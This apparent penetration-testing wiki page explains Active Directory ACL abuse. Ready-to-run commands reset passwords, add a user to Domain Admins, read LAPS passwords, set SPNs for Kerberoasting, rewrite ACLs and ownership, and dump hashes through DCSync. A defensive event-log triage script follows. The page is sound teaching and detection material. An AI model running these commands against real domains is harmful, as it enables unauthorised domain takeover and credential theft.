ACL Abuse

Exploitation

Active Directory objects are protected by Access Control Lists (ACLs). Misconfigured permissions can allow low-privileged users to modify high-privileged objects, leading to domain compromise.

Common Dangerous Rights

Object Control

  • GenericAll - Full control over the object.
  • GenericWrite - Write access to all properties.
  • WriteOwner - Ability to change the object's owner.
  • WriteDACL - Ability to modify the object's ACL.

Specific Actions

  • ForceChangePassword - Reset user password without knowing current one.
  • AddMember - Add members to a group.
  • Self (Membership) - Add self to a group.
  • DCSync - Replicate directory changes (dump hashes).

Exploitation Techniques

ACL-based attacks exploit excessive permissions on AD objects. Tools like BloodHound are essential for identifying these paths.

GenericAll on User

Full control allows you to reset passwords, set SPNs for Kerberoasting, or modify other attributes.

Reset password:

```powershell
net user targetuser NewPassword123! /domain
```

Or using PowerView:

```powershell
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force)
```

GenericAll on Group

Allows adding members to the group.

Add yourself to the group:

```powershell
Add-DomainGroupMember -Identity "Domain Admins" -Members "youruser"
```

Or using net commands:

```powershell
net group "Domain Admins" youruser /add /domain
```

GenericAll on Computer

Allows performing Resource-Based Constrained Delegation (RBCD) attacks (see the Delegation section) or reading the LAPS-managed local administrator password if LAPS is deployed.

Read LAPS password:

```powershell
Get-DomainComputer TARGET -Properties ms-mcs-admpwd | Select-Object ms-mcs-admpwd
```

GenericWrite

Allows modifying attributes. A common attack is to set an SPN on a user to make them vulnerable to Kerberoasting.

Set SPN for Kerberoasting:

```powershell
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}
```

WriteDACL

Allows modifying the object's ACL. You can grant yourself full control (GenericAll).

Grant yourself GenericAll:

```powershell
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity youruser -Rights All
```

WriteOwner

Allows taking ownership of the object. Once you are the owner, you can modify the ACL to grant yourself full control.

Take ownership:

```powershell
Set-DomainObjectOwner -Identity targetuser -OwnerIdentity youruser
```

DCSync Rights

If you hold the "Replicating Directory Changes" and "Replicating Directory Changes All" extended rights on the domain object, you can perform a DCSync attack: impersonate a domain controller and request replication of account data, which yields the password hashes.

Dump hashes via DCSync:

```bash
secretsdump.py corp.local/youruser:password@DC_IP
```
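On the defensive side, every abuse on this page leaves a Security log trace on the domain controller: replication requests show up as Event ID 4662 with the DS-Replication-Get-Changes control-access GUIDs, SPN and ACL writes as 5136, group additions as 4728/4756, and password resets as 4724. The triage logic below is an added example (not part of the original page) that runs over constructed, already-parsed events; the domain controller account names in `DC_ACCOUNTS` are assumed.

```python
"""Triage Windows Security log events for the ACL abuses described above.
Added example; events are simplified dicts, sample events are constructed."""
# Schema GUIDs of the control-access rights that allow replication (DCSync).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Attribute writes matching the GenericWrite / WriteDACL / WriteOwner abuses.
WATCHED_ATTRIBUTES = {"servicePrincipalName", "nTSecurityDescriptor"}
SENSITIVE_GROUPS = {"Domain Admins", "Enterprise Admins"}
# Domain controller computer accounts expected to replicate (assumed names).
DC_ACCOUNTS = {"DC01$", "DC02$"}

def classify(event):
    """Return an alert string if the event matches a known abuse, else None."""
    eid, who = event["id"], event["subject"]
    if eid == 4662:  # An operation was performed on an object
        guids = {g.lower() for g in event.get("properties", [])}
        # Control access (0x100) with a replication right = DCSync-style read
        if event.get("access_mask") == 0x100 and guids & REPLICATION_GUIDS:
            if who not in DC_ACCOUNTS:
                return f"DCSync replication request by non-DC account {who}"
    elif eid == 5136:  # A directory service object was modified
        if event["attribute"] in WATCHED_ATTRIBUTES:
            return f"{event['attribute']} of {event['object']} changed by {who}"
    elif eid in (4728, 4756):  # Member added to a global / universal group
        if event["group"] in SENSITIVE_GROUPS:
            return f"{who} added {event['member']} to {event['group']}"
    elif eid == 4724:  # Password reset attempt (ForceChangePassword)
        if who != event["target"]:
            return f"{who} reset the password of {event['target']}"
    return None

def scan(events):
    """Run classify over a batch and return only the alerts."""
    return [alert for alert in map(classify, events) if alert]

# Constructed sample events: one benign DC replication, then four abuses.
SAMPLE_EVENTS = [
    {"id": 4662, "subject": "DC02$", "access_mask": 0x100,
     "properties": ["1131F6AA-9C07-11D1-F79F-00C04FC2DCD2"]},
    {"id": 4662, "subject": "youruser", "access_mask": 0x100,
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"id": 5136, "subject": "youruser", "object": "CN=targetuser",
     "attribute": "servicePrincipalName"},
    {"id": 4728, "subject": "youruser", "member": "youruser",
     "group": "Domain Admins"},
    {"id": 4724, "subject": "youruser", "target": "targetuser"},
]
```

Legitimate replication comes only from domain controllers (and Entra Connect / Azure AD Connect sync accounts if deployed), so the allowlist is short and any other principal requesting those rights is worth an immediate look.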